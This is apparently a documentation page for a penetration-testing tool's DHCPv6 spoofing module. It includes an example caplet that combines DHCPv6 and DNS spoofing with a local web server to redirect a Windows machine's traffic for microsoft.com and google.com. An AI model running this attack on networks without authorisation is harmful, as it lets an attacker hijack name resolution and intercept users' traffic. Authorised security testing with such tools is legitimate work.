dhcp6.spoof
This module attacks Windows hosts via DHCPv6. It replies to DHCPv6 messages with a link-local IPv6 address. The attacker becomes the default DNS server (details).
Commands
Section titled “Commands”dhcp6.spoof on
Section titled “dhcp6.spoof on”Start the DHCPv6 spoofer in the background.
dhcp6.spoof off
Section titled “dhcp6.spoof off”Stop the DHCPv6 spoofer in the background.
Parameters
Section titled “Parameters”| Parameter | Default | Description |
|---|---|---|
dhcp6.spoof.domains | microsoft.com, goole.com, facebook.com, apple.com, twitter.com | Comma separated values of domain names to spoof. |
Examples
Section titled “Examples”The following is the mitm6.cap caplet performing the full DHCPv6 attack versus a Windows 10 machine which is booting:
# let's spoof Microsoft and Google ^_^set dns.spoof.domains microsoft.com, google.comset dhcp6.spoof.domains microsoft.com, google.com
# every http request to the spoofed hosts will come to us# let's give em some contentsset http.server.path /var/www/something
# serve fileshttp.server on# redirect DNS request by spoofing DHCPv6 packetsdhcp6.spoof on# send spoofed DNS replies ^_^dns.spoof on
# set a custom prompt for ipv6set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}# clear the events buffer and the screenevents.clearclear